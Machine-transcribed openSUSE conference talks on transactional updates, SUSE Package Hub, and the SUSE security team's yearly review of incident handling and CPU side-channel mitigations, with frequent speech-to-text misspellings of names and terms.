soon as you think, oh, the update should now be applied, then you can actually reboot your system. That's the reboot trigger. Why is that? Because a reboot is an atomic thing. You have the guarantee that no process is actually running anymore if your system is rebooted. And you can safely boot into that new snapshot then. How is that actually done? BDRIVS knows a default snapshot, so if you set, if the update was successful, the new, in that case, green snapshot will be set as the new default snapshot, and Grapp will just boot the default BDRIVS snapshot. So that's actually what it is. If you want to try transactional update and haven't done it yet, you have a huge chance now if you're using leap 15.0, because the update to leap 15.1 may be one of those chances where you have major changes to the system where things may actually break. So you can just install transactional update, and it will do the update in the background. You can just ensure everything is going smoothly without destroying your currently running system. And if everything goes smoothly, you can just reboot and you're in the new system. That's one use case which you can use. However, there's one exception. Sorry, not exception. In that case, you would do that on a read-write file system. If you use transactional updates in a read-only file system, I'll tell you about the implications in a few seconds. So let's have a look at the second part, what's new since last year. First of all, we still have our var directory. Var is not part of the root file system. So that means that it's also not part of the actual update. If packages try to modify var, you would get changes to your currently running system, which is not what is intended to be done by a transactional update. So that's still the case. We won't mount, even bind mount var into the update. If you have a package maintainer, you may have received a bug ticket by us. In the case, you did actually modify the files in var. Those packages would have been incompatible with a transactional update. And in the last year, we tried to resolve all the remaining packages where var modifications were still done in some postscript or whatever. Currently we know about it's, meanwhile, less than 30 packages, which are still doing modifications to var. Some of them can't be solved easily because it's an architectural problem. But I think 30 packages out of 12,000 is a quite good ratio. So transactional update should be considered stable. If we missed something, please tell us. There's an easy way to tell us, to tell whether an update actually did something which it was not supposed to be. Namely transactional update will now print out files at the end of the update, which would be over mounted. So let's assume a change to var was done. It will print out the corresponding file which was changed in var. The same if a file was modified in your home directory or whatever. You'll get a list of those conflicting files which will not be seen in the running system after that. The second thing is ETC handling. You may remember if you heard the talk or if you're an active user, on a read-only file system which we usually have with transaction updates, namely in microS, in cubic, or if you use the transactional server role in OpenSUSE, the Tumblebee, Dalipe. ETC is mounted as an overlay file system. Why is that? You still want to modify your configuration files. Those overlays are stored in valid overlays. And the new thing, since several months, each of those overlays, sorry, each snapshot gets one separate overlay, or one new overlay. You may remember that all the overlays shared one, sorry, all the snapshots shared one common overlay which obviously caused problems when trying to roll back because you then got a mix of all configuration, new configuration files and all snapshots, so we improved that. One interesting thing about those overlays is they are stacked. So if you apply a new update, you'll get that new overlay snapshot which is transparent and you'll see all the lower overlays. I'll show you what a thread actually means. That's an ETC entry for the ETC mount. And you can see several things here. Obviously we're currently in snapshot number 18, which is part of the upper there in red. And we have several lower there. We had a snapshot 16, 12, 10, 8, 7, 6, and we have the SysRoot ETC as the last entry. And you'll just accumulate changes in those overlays. So if you did something, let's say in overlay number 10, and if you didn't override or change that file again in a new overlay, the file will be taken from overlay number 10. So as I said, it's just transparent. If you go down the stack, if you go up the stack, or if you roll back to a previous snapshot, the ETC will only get out until, let's say, snapshot number 12, so new changes won't be visible. Of course, we don't want to have our stack growing infinitely. So what we actually did is we implemented a cleanup algorithm. Snapper will occasionally clean up your old snapshots. If the snapshot is not available anymore, you obviously also don't need the overlay for it anymore. So the overlays will be synced until the actual snapshot, but be aware that the state in the snapshot of ETC is not consistent, or it doesn't represent anything, only the combination of ETC of the snapshot and the overlays stacked on top of each other gives the actual contents of ETC. Yeah, we have a few other things. Oliver contributed Kexic as a reboot method. We have also support for QD as a reboot demon now. If you want to use telemetry, you can use Intel's telemetrics. And new, we also have a documentation now. It's the transaction update guide, which can be found on the QBIC Vkey, the link to the transaction update guide. Or that's also a link if you want to use the presentation to click on it directly. Another thing that was requested at last year OSC was to get an option to influence the behavior of the superrun. So we had interactive and noninteractive commands. By default, for example, if you type DUP, which is supposed to be automatic, you always get it in noninteractive mode. And now you can just append the corresponding parameter if you think the option is not what you actually want, or if you want to resolve problems manually. If you just want to roll back to a previous good snapshot, you can just type transactional update rollback last now. And support needs restart now. It's a framework for indicating whether the system needs a reboot. If it does, any applications is using that, transactional update will now indicate the correct state. So as I said, you have the perfect opportunity to test transactional update now with the update from Lib 15 to 15.1. If you're interested in the ETC and VAR behavior, or let's say the ETC behavior, there's a very interesting talk tomorrow by Torsten Koko, where we will discuss the challenges which the ETC handling has, especially considering the handling or the resetting of states. And we had several talks during this year's conference already. Some of them are the OpenSource Micro S talk and the OpenSource Micro S desktop talk by Richard, and the talk just before this one by Kimlin, where you should choose OpenSource to cubic where you can see transactional update and use on those systems. So that's it basically. You can find us on cubic.opensoosie.org. Transactional update is a part of the cubic project, or you can find us in ISE, the link is below. So I have, I guess, one minute left, don't I? Any questions? Yes? Transactional updates increase the security of the system? Transactional updates, whether transactional updates increase the security of the system? Yes, when combined with the read-only-rootfall system, because then you have the read-only-rootfall system where the data can't be changed easily. Transactional update is the only supported update mechanism on read-only-rootfall systems. You can't update it without interfering deeply into the system anyway. So yes, it's not transactional update itself, but the mechanisms behind it. Yeah? So what I was wondering about last year is, let's say, do you sort to change the role of the system by a high speed? That's always a combination of the relation changes, and usually you're planning to change them. Are there relation changes? Are they already ending up on the right at sea or whatever? Or do we have to basically make sure that there are things that you can update and then start transactional and transactional? The question is about salt in combination with configuration. Is it possible to combine configuration changes and package changes at the same time? No, because salt doesn't know about transactional updates, so it can't install packages in a correct way. If you are just changing configuration files, that's no problem at all because configuration is dynamic. If salt is only changing them, it can update the configuration. But yes, salt currently doesn't know about installing packages in a transactional update context if you are not doing it manually, of course. So that's not possible directly. Does that answer your question? Yes, no, we have to fix it. We should fix it, yes, that's correct. Let's discuss that off-screen. Okay, so that's it from me basically. I now thought we successfully implemented Windows reboot methods. Let's start with blue screens next. And thanks. Take my talk now. Thank you.
You may have heard about transactional updates already - that thing that will force you to reboot your system just like on Windows. Well, it still does, but it also provides a huge benefit compared to your regular updates: It won't break your currently running system. transactional-update is the default update mechanism on openSUSE Kubic and when using the "Transactional Server" role in openSUSE Leap or Tumbleweed. This talk is intended for both existing users and newcomers and will feature the following contents: - Give an overview of the design - Highlight the most important changes since last year, including the all-new _/etc_ handling - Give a general overview of the file system layout
10.5446/54427 (DOI)
Hello and welcome. Today I'm talking about Susie Package Hub. So who of you already know what Susie Package Hub is or is using Susie Package Hub? So probably more than a half of the people here. So I'm just explaining what Package Hub is. It will be a little bit shorter than usual. But to give you also a background how Package Hub basically evolved and what was the reason through the created Package Hub. So if you imagine basically this was the situation that or the reason Package Hub was created because back in time it was around slash 12. Slash comes with a lot of packages, supported packages, but there are still some packages missing for some customers. So we received some requests from customers adding more packages even without support. So they can just use it for any convenience. So another reason was also that we received some requests from customers. It's very hard to find official packages for slash besides the packages that are coming on slash. So this is an old screen shot so it looks different today. So if you search packages on software open Susie or in the OBS and open build service, you will find many projects. For example, this is if you search for T-Max, you find several projects where you find packages for not only for leave but also for slash 12, 15 and so on. So you can just use those packages but in an enterprise environment for the customers it's very, sorry, it's very, it's sometimes very difficult to just use packages that comes from somewhere, some source that they basically don't really trust. And you never know if a project is going down or if it's going to be deleted and then you're sitting with your version of the package. So that's why we created Package Hub. It's basically another project in the open build service that hosts the packages that comes with Leap and it's easier to access. So the easiest way for the customers is always to use one source of truth. So it's basically the YAST and the Susie Customer Center is basically there. The door to additional modules, extensions and additional software. So that's the few slash customers have. So we had to put this project into the Susie Customer Center basically so that's available through YAST in an easy way. So talking about packages, it all started with just a few packages. So that means we received, for example, requests from customers. They wanted to have the KDE Plasma 5 packages in there. So this is SLS 12 around that time. So the number of packages are not really that accurate but just to give an idea where we started. So this is basically SLS 12 around the number of packages, 2500. And we plus, minus, some hundreds that a customer gets when he installs less. Compared to OpenSusie Leap at that time, a few more packages are available for free. And of course, Factory is way ahead of 10,000 packages. I'm talking about source packages because binary packages are, the number is a lot higher. So we started adding the KDE Plasma 5 packages which were around 400 packages or something like that and some more packages. And that's basically what Package Up was in the past during around SLS 12 time frame. OBS, I think this is, you all are familiar with the OBS. So I will just go through it very quickly. So this was the only option for us to use because SLS itself was basically built in the build system. So we just used it, credit additional project. But for customers, as I said, it's not that easy to use if you're a developer or a package. It's basically your source of truth. There is a lot of confusion about Package Up or back ports. Who of you knows the difference? One guy. So that's why I'm explaining it here because you always have to think that from a customer perspective it's basically on the right side. So as I mentioned, the view is through YAST or the Susie Customer Center. So there we named it Package Up. But the project itself is hosted in the OpenBuild service. And back in time, the project wasn't named Package Up. It was just named Backport because the packages were backported from the Leap version. So that's, yeah, you need to understand that when you're talking about the Backports, that's the project inside the OBS. And when you're talking about Package Up, it's basically the Susie Customer Center view to the Backports project. And of course, you can access the packages inside OBS directly. So that's also one option. It is quite hard to add a few more hundred packages with giving support. So Susie has also a limited number of employees. So all packages are without support, basically. But the great thing about it is that every package that's built in the OBS for Package Up is tested. Basically they are running RPM-Lint checks to make sure the package doesn't conflict with any package that comes with the SLEE. So that means that no files are replaced or overwritten by that package. If that would happen, RPM-Lint just throws an arrow and just shows, hey, this package has a conflict with a package that comes with SLEE. So this is a mechanism to make sure that every package on Package Up doesn't conflict with any package on SLEE. And it doesn't break the supportability. So if the customer has any problems with other packages on SLEE, it doesn't break basically the support. It can be different if the customer installs just randomly packages from other sources. So the system would be then really hard to be supported by Susie. Okay, what's the current status? So I already showed you how it was from a package perspective, like the number of packages that we added to Package Up back during this less 12th time frame. So today it looks quite different because we have also followed a different approach because during SLEE's 12th, we put all the packages that we put into Package Up from factory. So every package has to go through factories, or probably some of you know the statement factory first, to make sure that the package get reviewed and then we could pull it in. But Package Up for SLEE's 15, we are doing it slightly different because we want to make sure that we align as much as possible with open source ELEEP 15. So we are taking basically every package that doesn't conflict with the SLEE's package from ELEEP into Package Up 15. So that's why basically the number of packages in Package Up 15 is that high. And as you can see, it really gets almost as close to to ELEEP 15. This is because it brings another nice side effect because with ELEEP 15 you are able to migrate from ELEEP to SLEE's. So that means with the bare minimum, I think server installation from ELEEP, you are able to migrate it to a SLEE's system. With Package Up enabled, you could even install more packages like additional like the KDE, Plasma 5 environment, tools like T-Max or whatever you like. And then you can migrate it and you have these tools, these packages also available on this SLEE's system. So from a package level, these packages are also binary identical because basically these are the same packages. They just got rebuilt for SLEE's on Package Up. And that's the second thing we changed. So basically every new package has also goes through ELEEP then. That means that it gets then reviewed by the open source ELEEP people and then we can just pull it in into Package Up. And also the updates that are going to ELEEP, we are just pulling in to Package Up 15. What we also did, this is something more internally, we also used for quick testing, we are using Cancun, I don't know if someone of you already know Cancun. So it's basically continuous integration testing system. We are, let me put it that way, we want to use OpenQA as well, but OpenQA is a little bit more bigger in terms of like the framework is a little bit bigger and Cancun is a little lightweight framework that you can just pull up a virtual machine and do some package testing and just destroy it and then get your results. By the way, if you have any questions, just wave your hand anytime so I can answer them. So how to contribute? There are several ways you can contribute to Package Up because you don't need to be a package maintainer or a developer or someone or basically you can contribute on several levels. So for example, if you are a developer, you just want to deploy or share your code, you can as I already mentioned, make sure that you just create a package, get it into Leap and then it can be also pushed to Package Up and then it gets delivered to any installation and you can as a developer, you can see it as a deployment channel basically. So Package Up helps you to distribute your software, but it has to be free software. So open source software. If you are a package maintainer, it's much more easier because then you're probably already familiar with OBS and then you can just, if your package is already in Leap, you can just submit it and also to Package Up and then you're good to go. If you're a customer using Sless, you have several options. Either you are also a developer package maintainer, then you're good to go, but if you don't have the knowledge to add packages to Package Up, you can also ask either the community or you can ask as well to assist you to find package maintainers or people who are willing to do packaging to get in the software into Package Up. You want to use. So any questions? No questions. So feel free to visit us at, yeah. I can just repeat. So the question was if a package from Package Up basically damaged the software, then you basically damages the system and if the customer then still gets support. So the question is yes and no. So the thing is usually the support is able to identify the package and the cause. So if it's a package from Package Up, then I'm sure we can help at least the support and the customer to get rid of the problem or to fix the package. So you have to look into the specific problem then. So just for the stream or for the record, Scott already mentioned that basically if there are problems with the package, we have to look into it to just make sure that we just either drop the package or just fix it. Okay. No more questions? Oh, there's one more. Ah, good question. So the question is how and where you can request packages. So that's very deeply hidden because we don't want to. No, seriously. The thing is that we are also thinking of having something on the website on packagehubsoose.com that you can vote or you can just add missing packages you need basically. Currently, it's not in place. So you can drop us an email at packagehub.soose.com. You can just ask us. If it's in low hanging fruits, let's call it that way. So an easy package that builds on slas and doesn't have any big security concerns, then we can just add it. But if it's a package that has a huge dependency list and some security concerns, then we have to really talk about that and think about that because also usually the package maintainer should be involved in that process. Okay. No more questions. Thank you very much and enjoy the rest of the day.
SUSE Package Hub provides open source packages from the Community to SUSE Linux Enterprise Users. This talk shows the current state, explains how to contribute and also gives some insights in the live of Package Hub.
10.5446/54428 (DOI)
Yeah. Welcome to security review of the last year. My name is Marcus. I will give you a bit of retrospective of the last year, put on some highlights, but also tell you about our work that we are doing just in a pretty high level way so it will not have many technical details. So first, who are we? We are the SUSE security team. We are currently, let me count, eight people. Our boss has changed recently, so his name is Ivan Teplin. He's been with us for one month now. We have one project manager, that's me, and we have several security engineers. So in alphabetical order, we have Alexander, Alexsandros, Johannes, Malte, Matthias and Robert, and Alexsandros and Robert are sitting close to the back over there. The rest is unfortunately not here. We are still not complete. We've been still looking for a good security engineer. We have one very good candidate that we are trying to get and one open position that we are also planning to fill. So what are we doing? The work that we are doing is split into two major parts that we will go about separately. We have the proactive part and the reactive part. The reactive part is handling security issues, handling security incidents, reacting on the security incidents. We are doing that for all the ZUSA products, for all the open ZUSA products and distributions, but not for the kind of security issues that address physical security or website security for ZUSA. We are only working for the ZUSA Linux and open ZUSA products. The team is split into two parts. The reactive part has me as the project manager overseeing it, and we have Alexander, Alexsandros, Robert, and potentially a new guy working in this team and sharing the load in between. The proactive side, where we do software audits, like what you can imagine, pen testing audits, we approve the product releases that we do. So basically the release managers come to us and say, is my product secure? We do a final check of the product and give our green. Go ahead. And we do a lot of work before the security shipment during the development phase. And that part of the team consists currently of Johannes, Mild and Matthias, and another potential new hire that we hopefully will be getting this year. So in case you're looking, you're wondering what our names are, these are the names that a US ZUSA developer or ZUSA contributor will likely encounter during your work with the security team. So let me first talk about the reactive security, which is likely the more visible part of our work. We react on any reported security issues on our distribution, as mentioned both on SLEE and on OpenZUSA. To handle this load, I will give you some numbers in a minute. We have clearly specified roles so that everyone knows what to do, everyone knows exactly what he's been assigned to do, so that there is no confusion. We have split this into so-called incident managers and update managers, where we have currently two or three incident managers and one update manager. So the load is distributed evenly between the team. Control rotates monthly so that it doesn't get too boring and too one-sided for anyone. What is our task in the reactive side is we coordinate fixing the security issues from beginning from getting knowledge to it until the end, meaning release of all the updates and doing all the buck closing. We are not doing the fixes ourselves. We do that, we delegate it to the package maintainers, either the SUSE ones or the community maintainer, depending on who is assigned and the build service to the package. We also don't look at the source patches that get submitted, get fixed, that is also done by the OBS or EBS source review teams. The testing is delegated to the QA teams and these days there is a huge part of it done by automated testing just as Oliver told us before, mostly done by OpenQA, especially OpenSUSE is only tested by OpenQA at this time. There is the potential on OpenSUSE to have a testing repository added and used it, but we very strongly rely on OpenQA testing for OpenSUSE maintenance. The next part where we are involved is the release of the update and everything afterwards the documentation. Most of the documentation is automatically generated just because there are so many of it, only for specific incidents we do manual documentation work. So how does it look like? How do we handle the incidents? Where do we interface with the packages? We use the OpenSUSE bugzilla. We have a specific summary line tagging to make queries in bugzilla easier. So we start with a while-0 or while-1 prefix, then put in the CVE number as a prefix. We also put in the package name and then a short summary of the issue. That makes bugzilla searches very easy for us, for you and for everyone who wants to just look at or find such a thing. We fill in the bugzilla report with the description, with links to patches, with the reproteusers so that our QA can verify it or the package can verify it and whatever other information is needed. And we assign it afterwards to the package maintainer itself for fixing. If the package maintainer has questions, he can always come back to us, set need info, ask a question in a bug report and ask us if he needs help for fixing. Internally, we also use a tool called Smash that tracks the effectiveness and the ratings of code streams for the Susie and Enterprise products. Rating we have a simplified rating. It's called low-moderate, important critical. So four steps that kind of easy to understand and to look at. But we also use an industry standard rating called common vulnerability scoring, version free, which gives, which has a lot of indicators which in turn turn into number between zero and ten. That is also used in various industry standards to rate how fast security updates need to be applied or fixed. We evaluate and mark what is affected on which SLE code stream. That to some degree also reflects open SUSE code streams and we are also planning at some point in the future to directly track open SUSE also with this tool. And there's one thing for the minor security issues. We decide occasionally it can wait. It doesn't need to be fixed right away because it's unlikely exploitable or it's really a minor issue. Or if it is a bigger issue then we request an update via our workflow management tool. So first statistics as promised. So I have a query running since 2006. And you notice some trends. So that's the open box per week. And it starts at 2006. And on the right is the 2019 last week. So we started around 11 bucks per week and it really continued until 2014. And then it got very noisy. And knowing from the security point of view that happened because a lot of more automated bug finding was happening. So with fuzzing, with more attention on specific tools with automated bug finding, people were suddenly finding much more bugs in the software. One big example is ImageMagic for instance where over the last years there have been found like 500 security issues or similar. What is interesting is also however that it now starts to decrease a bit. So we had to peak from around 30, 40 bucks open per week. But the last year, the last one and a half years have seen a slight decline. That might mean that some of the means of automatic bug finding are exhausted. Or it might mean that people are focusing themselves more on different topics. Or that someone is not opening enough CVEs or classifying CVEs anymore. So while I was thinking that the trend would only go upwards, I was kind of disproven here. Let's see what the next years will bring. Short look at our incident tracking system that we use internally. We are getting in this ticket system around 100 issues per day. But we open bugs only for around 5 to 10 depending on whatever is being found. So having a good UI where we can track it, you can think of it mostly like a ticketing system that additionally has on top the rating and effectiveness marking that we do. Here's a bit longer list where we really already have specified ratings and affected packages. So how does the update management on our side work? So the package after getting knowledge and after fixing the package, he submits it. The security team, the update manager in this case accepts the update, writes the metadata that is shown to users that gets displayed later on in the automated, generated documentation like the summary, a description, a human readable description, and a list of issues in a machine readable format. We checked if it's, of course, it's building. We have some bots that also catch it if it's not building before these days. But under certain circumstances, it might not build and might need some help. And we then forwarded to QA. So basically QA in that case is set both automated and also manual QA. The automation does these days all the regression testing. So regression testing is no longer done manually, but our QA teams do manual bug fix verification. So they verify that the bug is present before and that it is fixed afterwards. Once QA is finished, we basically only then press the release button. List of the documentation, the emails that you see, the patches that is all automatically generated. But for bigger issues, we do some manual work. So look at our, we have a tooling also for the update management in the enterprise. As you see, we have in that case, we have 138 updates in QA or waiting for a QA engineer with the amount of packages that we release. We release like 50 updates, 60 updates per week on the SLE side, around 20 to 30 on the open source side without a tooling. It's really not manageable anymore. This is tooling that we developed ourselves within the maintenance team with dedicated engineers looking at it that makes our work more efficient and easier. Yes, so what we deliver in the end, as mentioned, of course, the updates themselves get to your system. We send out notifications per email. They are uploaded to a website for this SLE updates. We also send, of course, emails to the open source announcement lists. And we generate advisory data in a standard XML format called CVRF, common vulnerability reporting format. I hope I got it right because that's all acronyms. But that basically encodes the advisory in a very big XML blob and can be then used for importing into ticket systems, et cetera. We also generate other information. So on a per CVE information, we generate for every CVE we find and evaluate and fix. We have one page on our website where you can see description, ratings, effectiveness and what we have released. Also this similar data is generated by us also for machine readable and machine readable format called Oval, open vulnerability and assessment language. Yet again a very big XML format that you can run through an interpreter and see if the system is still affected by a CVE or not and what needs to be updated. So some statistics for this year compared to last year. We are not this year by 2018 just to have a complete year. So the number of CVEs that we looked at is 3,000. So 300 less than last year. Kind of coincidates with the open bug trends a bit. We opened around 2,280 bucks. That's 300 less than in 2017. And if you look at the classification, so I just put in the big numbers, same number of approximately the kernel bugs but way less image magic and graphics magic bugs. So it really 170 bucks less or CVEs less for image magic and graphics magic just because there the bug finding has, that we are using fuzzers has exhausted the bugs basically. It has not completed exhausted them. As you see it's still 90 bucks which is quite an amount but it's not as massive as in 2017. Similar also for Firefox. Firefox 50 bucks less than in 2017. So there's still fixing and finding bugs in those code bases but it gets better over time. The number of updates that we released, firstly it looks much higher but the reason for that is that we have more service packs and more products in 2018 and 2017. I have not equalized it to the number of service packs that would have been a bit too complicated with the general support and LTSS support. For open ZOOZER that is a bit more comparable even though we have 42.3 and 15.0. We have released some more updates for open ZOOZER than in 2017 and I also looked at how much we import from SLEE and we import around 50% from SLEE at this time. Total number of CVEs fixed. We have 100 CVEs less fixed also explained by the image magic decrease mostly and these are the numbers for open ZOOZER and SLEE. They don't add up because they share CVE space. So one thing that the reactive team does is I mentioned it before for some issues we do specific documentation or more documentation and these are the so-called high impact vulnerabilities the things that you read and press about or even on a target show or on CNN. Started all with hard bleed and shell shock and went even into this year with system down and just lately the MDS CPU issue. These issues are special so usually you have to think that our reactive incident work is just it's a pipeline. We are opening bugs, updates get processed, packages get submitted, get released and it just takes a while. But for these high impact vulnerabilities that have a severe technical impact or where people really want to fix right now, we need a quicker reaction. We also need more communication of under what circumstances are we affected, what is the real impact? Is it really that big of a problem? And also documentation for CPU issues we need to document what options there are that customers can use to configure their system. And especially if there are also tricky fixes if you need to do something manually on your system to mitigate it. So we handle this a bit differently, but with much higher attention, with direct attention and we even have a specific team dedicated to the emergency update team that goes and does these fixes themselves, coordinates them, including even weekend work or late night work. So if one or two guys from the emergency update team are also here, Simon from the open Zuzo board is one of these members and Peter, I have not seen yet, but also a member. So last year I talked a bit about Stacklash and what we are planning to do and what we are doing. That was something from 2017. General problem where the stack growing down and MAP areas growing up would collide and could be exploited. And what we had done already was mitigating that in the kernel with bigger stack apps that could not be jumped over. We already had prepared GCC updates that were generating binary code that no longer has this problem. And that's something that only started in effect last year is that we released products open Zuzo Leap 15.0 and sleep 15 that already had this mitigation enabled. And we also started releasing last year's updates for enterprise 12 and also Leap 42.3 that these packages that we released were no longer affected by the Stacklash issue. And our efforts paid themselves off and that's something I want to show off is because in January there was a system down exploit of the system D, where regular user space program could gain root execution by just sending a specific log message to the journal D. But as we had already built system D with the Stacklash protector also within all the updates both Zuzo Enterprise and open Zuzo were already fixed. So doing this proactively, building the packages proactively with this option really paid out as we were not affected by this problem begin of this year. So the big topic is now what to go to in a bit more detail, the CPU issues. So last year I also talked about a bit of mail down and spectra already. But they got some new friends this year and last year the general overview is a side channel information leak attacks that use speculative or out of order execution. To be class spectra is a speculative execution of branches that might not be taken or are not taken, leaks information that happen to be accessed in those non-taken branches. And the other part is the mail down class of CPU side channel issues, basically lack of access control during this kind of out of order execution. Mail down itself was because during out of order execution the protection bit for user, for ring zero protected pages was not checked so everything from the kernel could be read from user space. And various flavors of that like page not present bit, also some high level bits like an MDS that we had. So various other flavors of those were also found. Fortunately none of them as severe as mail down itself but various flavors of both have been found. So the problem with those is that as there are CPU issues, we had a long embargo times. Also for the last issue we had over nine months, nine months of a embargo time. Just to prepare the patches, get every industry, other operating and hypervisor vendor under the same umbrella within timing, get the micro code updates ready. Interest really takes like half a year, three months to half a year to get micro code, fixes ready for their CPUs. So it was kind of long embargo times and we of course need to facilitate it in our kernels test that and be ready on the date of shipment because these issues still attract quite a lot of attention. One issue is of course that they have also almost all of those fixes get some performance losses which is especially in a cloud provider space, not a good thing if suddenly your cloud runs 10% slower or something. I said it become mostly a new family, mail down, 1-4 bound check bypass door, lazy FPU that was possible to leak CPU, FPU registers, L1 terminal fault and net spectrum happened in 2018 and even in 2019 we found, let's misspelled spoiler, smother spectra, port smash and just from 14th of May micro architectural data sampling called also fallout, with or zombie load attack. So the good news is that for a number of them we have mitigations or we have the potential to mitigate them completely, usually the mail down family that is occasionally done with micro code and kernel mitigations acting together and we know how to fix the other ones that are mostly bug classes. And the other good news is that the affected Intel, largely Intel CPUs, Intel has been started shipping new CPUs, Cascade Lake and newer that are no longer affected by the mail down problem. So it's good for Intel that they are selling more CPUs, it's also good for us that we get back our performance and security. So not so good news or the bad news is that lately there have been some issues found that are exploitable when using hyper threading. So hyper threading is where CPU core has running multiple threads of execution and they share various resources like load buffers, store buffers, computational units and so on. And the last attacks at 1TF and the micro architecture data assembling, they were largely exploiting these smaller buffers shared between hyper threads. So the mitigations that we have, they are effective if stuff executes in serial way, like user space to root, to kernel space and back, that is okay but for threads on the same core for a type of thread on the same core, it is hard to solve because we cannot really influence what runs on the other thread. So not in a current setting. So the obvious solution is of course to schedule only processes with the right privileges on the same core. That's called gang scheduling or co-scheduling. Unfortunately that's not really, there's no really working code for that because doing it in the right way that cannot be exploited is very tricky and likely has a similar performance impact than just switching off hyper threading altogether. So there are some draft patches for the Linux kernel and I think also for Xen but these are not yet production ready. We hope that they get to a point where they are production ready and performant and then we will go and deploy them but so far they are sadly not ready yet. So if you are really concerned about on your machine having an attacker running on the same core trying to steal your secrets, the only way that is currently there is to disable hyper threading on your system. So we had like eight different issues, seven different mitigations and they appeared a website called makelinux fast again that put in all the kernel command line options that are needed to get the full performance back. And you see if I now hide it and you try to remember it, even I couldn't remember it. So it needs a simpler front end. And the kernel guys, the Linux kernel developers found yes, it definitely needs a more simple configuration option and they just implemented with the 5.1 or 5.2 kernel, I think 5.1 kernel. They implemented an option, the kernel bootline option called mitigations that controls all of the CPU mitigations at once. And it has three easy settings. It has the setting off, just disabling it, getting back all the performance. It has the setting auto, like it will select based on your CPU type what is needed or what is not needed as mitigation. So if you have a new CPU, it will not switch on Meltdown protection. And it also has the option of disabling hyper threading if you're so, if you're so desire. At SUSE we have discussed it on various levels and decided with going with the default of auto, so leaving hyper threading enabled, leaving that kind of performance still available, but at least enabling all the standard mitigations that are available. And to make it easier also for our users, we have integrated this into the Jaston installer. So if you install the installation overview, we'll have in the security section a CPU mitigations option that you can click on and you can easily change from auto to either off or auto or no SMT depending on your security needs. So there's one last bad thing of that is that some of the issues are bug classes that are not getting fixed in the processor. So Spectre variant one, that is basically branch prediction or speculation over branches that are not taken. This is will not be getting fixed in the processor, but we are supposed to fix that in the program code in the kernel or in user land. It's mostly a bug class. So if you want to fix, there's not a single line of code that needs to be fixed, but it's in a lot of places. And it needs, yeah, it's in a lot of places and there's no generic way to do it. There has been some research into compiler based mitigation of that of Spectre variant one, but unfortunately the performance loss of doing this in a compiler is quite high. So it's really like 50% performance loss if you do it via a compiler. So it's under control in the kernel. The kernel has deployed things like index masking and the respective fences that are needed to control that. Our user land code has also been already supplied with it like some Java script, just in time compilers and so on. But this might be an issue where we are getting, where we still need to take care about in the future. There are two others that were only recently published, Smother Spectre and Portsmash. And these are not leaking direct information, but these look at what other, these can find out what the other CPU thread is doing. So if it's doing a lot of vector stuff, if it's doing a lot of multiplications or additions. By monitoring that you can find out for instance, if there's a cryptographic algorithm running on the other CPU that is not specifically prepared for that, you can find out what kind of keys the other cryptographic algorithm is just processing and find out the content of the keys. So the only way to fix that currently is to really write cryptographic code and any other code that could be snooped on, where information could be gained on from snooping on in a constant time manner. So having constant time compares, constant time multiplications, additions and so on. Fortunately, a lot of cryptographic code is already prepared for that because this kind of computational side channel issue is not a new thing, but it becomes more urgent with this knowledge about this exploitation of issue of via hyper threading. So enough for the reactive security part, what is our proactive team doing? Their general mission statement is making products secure before shipment and implement a secure development lifecycle within Zuse. We are doing this at various stages. We are doing this in automated fashion, in a manual fashion. So the first thing that comes to mind is automated checks during build that, similar to what we do with make check, we also do for security parts. Like if you add a new security binary, your build will fail if it's not white listed by us. If you add a new D-Bus service or policy kit rule and it's not white listed by us, your build will fail and we will tell you to contact a security team for white listing. And that time, you open a bug, we look at the code, we tell you where the bugs are and you fix the bugs and then we white listed. That includes all other things, system network services or whatever security interface you have in your package or in your product. We are not doing this just before the release, but we are doing this during the whole process. So basically, similar to the open-source effector model, all these audits are rolling. Especially as we are also working with factory, the factory developers come to us, say they have a new D-Bus service, can we please review that? We review it, it gets approved. And at some point in time, it gets shipped via open-source-leap or through the end-up price. These are largely based on the packages that we are doing, but we are also doing product audits. Currently, we are doing product audits or the final product, send off audit a month before usually product is getting shipped. So open-source-leap 15-1 was reviewed a month ago. Johannes took a look at it for a week and fortunately found no big issues there. So even if we are the security team, what we are doing is set, we work in factory, a lot of stuff that we are doing is both done in open-source, even in open-source at first and then later on in suzium's enterprise. But our focus is of course getting suzium's enterprise secure, but open-source is our main driver of work there. Just to look at the workload that we had, we had around the same number of audit requests last in 2018 and in 2017. But we were able to process more because our team has grown. I have not gotten those numbers unfortunately. What does the project team also do? We are new hardening methods. Last year I talked a bit about pie support. What we are currently working on is that we had LD flex, we had for a long time already, but now we also want to deploy the minus set now hardening for F binaries. And we want to also move some compiler warning checks that we are currently doing in post-build checks to directly to W error options, which is done by the compiler team. So that your build will not just emit warnings, but it will directly fail if something is wrong. Our colleague Karol, fortunately no longer in the security team, but now in a different role, he is a very big UB key fan and yet he just has now a UB key workshop at the UB key talk yesterday. That is something that we added or improved up in open-source in the last year and also shipped in SLS 12, Sb4 and SLS 15 for two-factor authentication. Last year also saw some Go script security issues. I didn't mention them earlier, but what we did with Go script is that we improved the hardening for Go script. So for image magic and graphics magic that can convert PostScript to images, we now shipped two configuration files. One configuration file has these coders disabled and one configuration has these enabled depending on your use case. And the default is that we are disabled them because Go script is still a very risky tool and might have more security issues than we have already fixed. We also this Sb4 PostScript display in places where it's not really needed or made it optional or tools that you wouldn't even have known that it does that, be disabled that. We also tried confinement using upArmor, a general confinement tool that fortunately has not been very successful yet because Go script is in use of a lot of pipe modes and a lot of settings that upArmor is not fully, where we cannot fully control it with upArmor. We had quite some success, but we had also some kind of angry users that were no longer able to run the preferred tool. We also do audits for non-distribution products like cloud and the storage. We had reviewed the new bigger tools that get added. So a lot of things happening at Zuse is adding stuff on top of distributions. We also planning or occasionally planning on embedding engineers into product teams while we haven't done this in the last year, that is an option that we always consider that especially in bigger agile teams that we occasionally help out and send someone to a system for some weeks. Then we have changing new products like the container management product, CASP, also the cloud application platform that is using Cloud Foundry based on top of CASP, on top of OpenStack, which are very complicated products, quite hard to understand products, quite hard to get an overview over, and of course, in turn, making these also hard to make secure products. But this is something that we will also be looking into in the next years even more closely. One side project that we are doing is certifications. One of this is directly security related. This is the DISA stick. Stick stands for Secure Technical Implementation Guide and is just another formalized word for hardening guide. It's really a formalized thing largely coordinated by the US government and especially the US military. They really describe in a step-by-step formal approach how to secure a system. They have various methods that can be handed out and a textual description form where you have 200, 300 rules that the administrator goes through, checks, makes the changes, gets the next rule, checks, makes the changes, and so on. Or it can be done in an automated format. In a so-called benchmark or SCAP format, SCAP is Secure Content Automation Protocol. And we are also currently working and providing this to our enterprise customers, but the same can only with some small adjustments also likely deployed on open zoos. So it's basically what we had earlier as hardening guides in a very formal 